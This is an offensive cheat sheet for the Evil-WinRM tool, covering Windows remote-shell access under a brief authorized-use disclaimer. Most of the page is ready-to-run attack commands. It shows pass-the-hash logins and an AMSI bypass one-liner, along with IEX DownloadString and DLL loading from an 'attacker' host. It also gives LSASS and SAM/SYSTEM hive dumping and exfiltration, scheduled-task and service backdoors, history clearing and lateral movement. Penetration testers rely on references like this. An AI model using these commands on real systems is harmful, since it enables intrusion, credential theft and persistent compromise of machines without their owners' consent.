EVILWINRM
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Evil-WinRM is a Windows Remote Management (WinRM) shell for hacking/pentesting. Provides PowerShell remoting with additional offensive features.
INSTALLATION#
# Ruby gem gem install evil-winrm # Or from source git clone https://github.com/Hackplayers/evil-winrm cd evil-winrm bundle install
BASIC CONNECTION#
PASSWORD AUTHENTICATION#
evil-winrm -i TARGET -u username -p 'password' evil-winrm -i 192.168.1.100 -u administrator -p 'P@ssw0rd' evil-winrm -i TARGET -u domain\\user -p password
HASH AUTHENTICATION (Pass-the-Hash)#
evil-winrm -i TARGET -u username -H NTHASH evil-winrm -i TARGET -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
KERBEROS AUTHENTICATION#
# Export ticket first export KRB5CCNAME=/path/to/ticket.ccache # Connect with Kerberos evil-winrm -i TARGET -r DOMAIN.LOCAL
SSL CONNECTION#
evil-winrm -i TARGET -u user -p pass -S evil-winrm -i TARGET -u user -p pass -S -c cert.pem -k key.pem
CUSTOM PORT#
evil-winrm -i TARGET -u user -p pass -P 5986
CONNECTION OPTIONS#
-i, --ip IP Target IP -u, --user USER Username -p, --password PASS Password -H, --hash HASH NTLM hash -P, --port PORT WinRM port (default: 5985, SSL: 5986) -S, --ssl Enable SSL -c, --pub-key FILE Public key for SSL -k, --priv-key FILE Private key for SSL -r, --realm DOMAIN Kerberos realm -s, --scripts PATH PowerShell scripts path -e, --executables PATH Executables path
BUILT-IN COMMANDS#
FILE OPERATIONS#
upload /local/path /remote/path # Upload file upload /tmp/shell.exe C:\Temp\shell.exe download C:\remote\file /local/path # Download file download C:\Windows\System32\config\SAM /tmp/SAM
MENU AND HELP#
menu # Show menu help # Show help Bypass-4MSI # AMSI bypass Dll-Loader # Load DLL Donut-Loader # Load Donut shellcode Invoke-Binary # Run binary in memory
AMSI BYPASS#
# Built-in AMSI bypass
*Evil-WinRM* PS> Bypass-4MSI
# Manual bypass
*Evil-WinRM* PS> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
LOADING SCRIPTS#
LOCAL SCRIPTS FOLDER#
# Start with scripts folder evil-winrm -i TARGET -u user -p pass -s /opt/scripts/ # Load script *Evil-WinRM* PS> Invoke-Mimikatz.ps1 *Evil-WinRM* PS> Invoke-Mimikatz # Or directly *Evil-WinRM* PS> . .\Invoke-Mimikatz.ps1
LOAD FROM URL#
*Evil-WinRM* PS> IEX(New-Object Net.WebClient).DownloadString('http://attacker/script.ps1')
LOADING EXECUTABLES#
EXECUTABLES FOLDER#
# Start with executables folder evil-winrm -i TARGET -u user -p pass -e /opt/exes/ # Run binary in memory *Evil-WinRM* PS> Invoke-Binary /opt/exes/mimikatz.exe
DLL LOADING#
*Evil-WinRM* PS> Dll-Loader -http http://attacker/payload.dll *Evil-WinRM* PS> Dll-Loader -smb \\attacker\share\payload.dll *Evil-WinRM* PS> Dll-Loader -local C:\Temp\payload.dll
DONUT SHELLCODE#
# Convert exe to shellcode with Donut first donut -f mimikatz.exe -o payload.bin # Load in Evil-WinRM *Evil-WinRM* PS> Donut-Loader -process notepad.exe -file payload.bin
COMMON OPERATIONS#
ENUMERATION#
*Evil-WinRM* PS> whoami /all *Evil-WinRM* PS> net users *Evil-WinRM* PS> net localgroup administrators *Evil-WinRM* PS> systeminfo *Evil-WinRM* PS> ipconfig /all *Evil-WinRM* PS> netstat -ano *Evil-WinRM* PS> Get-Process *Evil-WinRM* PS> Get-Service
FILE SYSTEM#
*Evil-WinRM* PS> dir C:\ *Evil-WinRM* PS> Get-ChildItem -Recurse C:\Users *Evil-WinRM* PS> type C:\file.txt *Evil-WinRM* PS> Get-Content C:\file.txt
CREDENTIAL HARVESTING#
# LSASS dump *Evil-WinRM* PS> upload procdump.exe C:\Temp\procdump.exe *Evil-WinRM* PS> C:\Temp\procdump.exe -accepteula -ma lsass.exe C:\Temp\lsass.dmp *Evil-WinRM* PS> download C:\Temp\lsass.dmp /tmp/lsass.dmp # SAM/SYSTEM/SECURITY *Evil-WinRM* PS> reg save HKLM\SAM C:\Temp\SAM *Evil-WinRM* PS> reg save HKLM\SYSTEM C:\Temp\SYSTEM *Evil-WinRM* PS> reg save HKLM\SECURITY C:\Temp\SECURITY *Evil-WinRM* PS> download C:\Temp\SAM /tmp/SAM *Evil-WinRM* PS> download C:\Temp\SYSTEM /tmp/SYSTEM
PRIVILEGE ESCALATION#
# Check privileges *Evil-WinRM* PS> whoami /priv # Load PowerUp *Evil-WinRM* PS> . .\PowerUp.ps1 *Evil-WinRM* PS> Invoke-AllChecks # Load WinPEAS *Evil-WinRM* PS> upload winPEASx64.exe C:\Temp\winpeas.exe *Evil-WinRM* PS> C:\Temp\winpeas.exe
PERSISTENCE#
# Scheduled task *Evil-WinRM* PS> schtasks /create /tn "Backdoor" /tr "C:\Temp\shell.exe" /sc onlogon /ru SYSTEM # Service *Evil-WinRM* PS> sc.exe create Backdoor binPath= "C:\Temp\shell.exe" start= auto
LATERAL MOVEMENT#
# Check WinRM on other hosts
*Evil-WinRM* PS> Test-WSMan -ComputerName target2
# Invoke command on remote
*Evil-WinRM* PS> Invoke-Command -ComputerName target2 -ScriptBlock { whoami }
LOGGING AND HISTORY#
# Evil-WinRM saves history to: # ~/.evil-winrm/history # View command history *Evil-WinRM* PS> history # Clear history rm ~/.evil-winrm/history
DOCKER USAGE#
# Run via Docker docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i TARGET -u user -p pass # With local folders docker run --rm -ti -v /opt/scripts:/scripts -v /opt/exes:/exes oscarakaelvis/evil-winrm -i TARGET -u user -p pass -s /scripts -e /exes
TROUBLESHOOTING#
CONNECTION ISSUES#
# Check if WinRM is enabled
Test-WSMan -ComputerName TARGET
# Check port
nmap -p 5985,5986 TARGET
# Enable WinRM (on target, if you have access)
Enable-PSRemoting -Force
winrm quickconfig
# Allow unencrypted (lab only)
winrm set winrm/config/service '@{AllowUnencrypted="true"}'
# Firewall rules
netsh advfirewall firewall add rule name="WinRM" dir=in localport=5985 protocol=TCP action=allow
KERBEROS ISSUES#
# Ensure /etc/krb5.conf is configured # Sync time with DC # Check ticket with klist
TIPS#
# Use tab completion # Commands are case-insensitive # Use 'menu' for available functions # Scripts folder must contain .ps1 files # Executables folder for Invoke-Binary
QUICK REFERENCE#
evil-winrm -i IP -u user -p pass # Basic connect evil-winrm -i IP -u user -H HASH # Pass-the-Hash evil-winrm -i IP -u user -p pass -S # SSL evil-winrm -i IP -u user -p pass -s /scripts -e /exes # With tools upload /local /remote # Upload file download /remote /local # Download file Bypass-4MSI # AMSI bypass Invoke-Binary /path/to/exe # Run exe in memory menu # Show commands